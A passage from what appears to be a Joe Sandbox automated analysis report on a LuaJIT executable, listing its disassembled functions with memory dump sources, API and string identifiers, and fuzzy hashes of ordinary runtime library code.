                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID: "$cosh
                                                                                                                                                                                                                              • API String ID: 1156100317-3800341493
                                                                                                                                                                                                                              • Opcode ID: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                                                                                                                                                                                              • Instruction ID: 4a1b07d089c42d5bf084351c7ab6732608db69f65e4f79a08934dad3710d0f74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B981CC32E38F8188D263AB35A4413B6B354BF5A3D5F519333D5AE31A51DFACA582CA10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772430978 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 851805269-3733052814
                                                                                                                                                                                                                              • Opcode ID: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                                                                                                                                                                                              • Instruction ID: dcf65c5627fabcbe12eb751604d99abfbb3fdc3bc090854bddf0cae7cd1a6cb4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C961A63353C28289EB20AF539448368B7A0EB54BD8F945235DA6C57796DFBCE850CB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723B2AA0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 148COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: type_info::_name_internal_method
                                                                                                                                                                                                                              • String ID: builtin#$false$nil$true
                                                                                                                                                                                                                              • API String ID: 3713626258-3570738779
                                                                                                                                                                                                                              • Opcode ID: 23cbb804629e43a59d8109324ffad1fa43563c5d8df94d050893fcdc2b640b46
                                                                                                                                                                                                                              • Instruction ID: bef54157fac26127ab163eacd725e4e44de5697b486be063dbe5a56c8600f7df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23cbb804629e43a59d8109324ffad1fa43563c5d8df94d050893fcdc2b640b46
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3261072363CA8586EA20DF19E480529B7A0F789BA4F905776EAAD477F4CE7CD540CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723CB290 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$_mbsncpy_s
                                                                                                                                                                                                                              • String ID: (error object is not a string)$=(debug command)$cont$lua_debug>
                                                                                                                                                                                                                              • API String ID: 1341846612-1452030528
                                                                                                                                                                                                                              • Opcode ID: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                                                                                                                                                                                              • Instruction ID: 8ef1e95dea1b3074edae46b2eb3534d6f91493295ff927e27cec551eb0a49240
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F314823A3C64281F760B762E8567BEE361AFC5384FD01135E96E466E6DE6CD900CF20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723C9610 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 53COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free_nolock_mbsncpy_s
                                                                                                                                                                                                                              • String ID: no field package.preload['%s']$'package.preload' must be a table$luaJIT_BC_%s$preload
                                                                                                                                                                                                                              • API String ID: 1937151238-4005544233
                                                                                                                                                                                                                              • Opcode ID: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                                                                                                                                                                                              • Instruction ID: ca1eb6f2611430ab93076dcbcbd7f872c9887a4c56d46ea5120b10b8759d80ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E213262538A8241D620BB65E8402AAE361FBC47B4F901276F9BD477E9DEFCD540CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244AD68 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                                                                                                                                                                                              • Instruction ID: 9930133d30590f3585da217df20650eb3bdf2c716e5728825c5436763770feee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03F03A63A39A4281EB547B22E494374A360FF88781FC42039D47F46664CFACE888CB20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245CDE4 Relevance: 7.7, APIs: 5, Instructions: 202COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF77245CE26
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF77245CDA3,?,?,FFFFFFFE,00007FF77245D196), ref: 00007FF77245CEE4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF77245CDA3,?,?,FFFFFFFE,00007FF77245D196), ref: 00007FF77245CF6E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2210144848-0
                                                                                                                                                                                                                              • Opcode ID: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                                                                                                                                                                                              • Instruction ID: 588e8c751adc90e01641f4dc48bd9ef508c7cd3a708d5cb981dc69a63b44cca9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E818623F3865285FB20BB67D4406BCA661AF44B98FC40135DDAE53695DFB8AC41CB30
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245FCD8 Relevance: 7.7, APIs: 5, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                                                                                                                                                                                              • Instruction ID: 11d871209bcc6d190ba82932bf4b389989f88753ac31345234db996a4dba4736
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F751D813E3894645E361BA379840379E2A0BF42354F958236EEBF265D1DFBCAC45CE11
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245F880 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                                                                                                                                                                                              • Instruction ID: 3c1c51d052b137250e87e6c34aa8929b5f729052e3488ac1d5ff45c3cd0f4a20
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB111927F38E0701F6543567A44637991816F56360E960636EEFE0A2DADE9CAC80C926
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723C8A50 Relevance: 7.5, APIs: 5, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 667068680-0
                                                                                                                                                                                                                              • Opcode ID: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                                                                                                                                                                                              • Instruction ID: 778941f772e52880609e4e06ecf0954cbfe8b69eb5ef44c7b0970d3ee56bcd03
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A01DB36528B8181D660AB15F84432AA770FB88794F545139EAAD52BB8CF7CD694CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245D7F8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                                                                                                                                                                                              • Instruction ID: 0916a7afc9d152d840dd0e6052fa5431c42580cfd57e31e9b1c0938b511f66da
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6681AE33F3C243C5FF657A2B8244239AB909F52748FD45035DDBA46699CAACAC01DF22
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772435C3C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: $*
                                                                                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                              • Opcode ID: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                                                                                                                                                                                              • Instruction ID: a509d8170e60a4ae686f9543ededc974b4061dee79a7c193a6af0bd023f44c25
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C81637393C24285E764BF27808617CBBE0EB09B84F944035CA6966296DFBDEC41CF25
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724363E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: $*
                                                                                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                              • Opcode ID: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
                                                                                                                                                                                                                              • Instruction ID: 304c160f4e5588e8debeafacaaee085cbb8ab4428b09d259b2c334088885a7b7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
